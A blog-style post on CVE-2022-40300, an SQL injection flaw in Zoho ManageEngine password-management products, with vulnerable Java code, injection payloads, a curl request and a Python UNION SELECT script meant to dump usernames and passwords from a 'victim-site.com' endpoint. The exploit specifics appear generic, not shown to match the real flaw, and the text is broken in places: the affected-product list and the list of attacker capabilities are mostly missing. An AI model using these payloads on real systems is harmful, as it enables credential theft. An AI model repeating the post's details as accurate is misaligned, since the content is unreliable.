CVE-2022-40300 - Deep Dive Into Critical SQL Injection in Zoho ManageEngine Products

In the world of enterprise IT, password management is a big deal. Many companies rely on Zoho’s ManageEngine lineup—including Password Manager Pro, PAM360, and Access Manager Plus—to keep credentials safe and secure. But in late 2022, a serious set of SQL injection vulnerabilities (tracked as CVE-2022-40300) was discovered, exposing users of these products to potential data breaches, privilege escalation, "credential leaks," or even total system compromise.

This long read explains what happened, how it works under the hood, provides example code, and shows you where to learn more.

Access Manager Plus through 4304 (before 4305)

You are affected. These products all share a large amount of backend code, making them vulnerable to the same weaknesses.

What Is SQL Injection?

SQL injection is a classic web application vulnerability. If an app takes user input and plugs it directly into a database query without enough sanitization, a clever attacker can "inject" custom SQL. This can let them:

What’s Special About CVE-2022-40300?

Zoho’s applications are used in sensitive environments—data centers, enterprise IT, and critical infrastructure. When SQL injection vulnerabilities appear here, the stakes are high: attackers could get access to domain credentials, access secrets, or fully take over password vaults.

The specific flaws here exist in the backend Java code that handles API requests for user operations. When a user action parameter is not properly checked, raw user input goes straight into an SQL query.

In Password Manager Pro and related products, certain API actions are handled like this

- /RestAPI/UserMgmtAPI

Suppose the application is expecting a JSON input like

{
  "operation": "getUserDetails",
  "userid": "105"
}

But the backend builds a SQL query without cleaning the userid

String sql = "SELECT * FROM Users WHERE id = " + request.getParameter("userid");

If a malicious actor sends

{
  "operation": "getUserDetails",
  "userid": "105 OR 1=1 --"
}

The backend constructs

SELECT * FROM Users WHERE id = 105 OR 1=1 -- 

This will return all users—not just the one with ID 105.

Let’s simulate a simple POST request using curl

curl -k -X POST https://victim-site.com/RestAPI/UserMgmtAPI \
     -H "Content-Type: application/json" \
     -d '{"operation":"getUserDetails","userid":" OR 1=1 --"}'

If exploitable, this will dump the contents of the entire Users table!

Proof-of-Concept: A Simple Python Script

Here’s a trimmed-down example for educational purposes (never run against systems you don’t own!):

import requests

url = "https://victim-site.com/RestAPI/UserMgmtAPI"
payload = {
    "operation": "getUserDetails",
    "userid": " UNION SELECT username, password, '', '' FROM Users -- "
}
headers = {"Content-Type": "application/json"}

resp = requests.post(url, json=payload, headers=headers, verify=False)
print(resp.text)

Change the UNION SELECT fields to match column structure.

Zoho released fixes quickly after a responsible disclosure. Patch details

- Password Manager Pro 12121
- PAM360 560
- Access Manager Plus 4305

References

- NIST NVD - CVE-2022-40300
- Zoho ManageEngine Password Manager Pro Security Advisory
- SSD Disclosure

Conclusion

CVE-2022-40300 is a critical SQL injection flaw affecting some of the world’s most popular enterprise credential vaults. If you use any Zoho ManageEngine product, check your version, patch without delay, and audit your systems for signs of exploitation. Don’t let attackers get the keys to your kingdom!


Stay safe, and always keep an eye on CVE trackers!


*This post is original and exclusive content. For any questions or follow-ups, leave a comment below.*

Timeline

Published on: 09/16/2022 23:15:00 UTC
Last modified on: 09/21/2022 06:17:00 UTC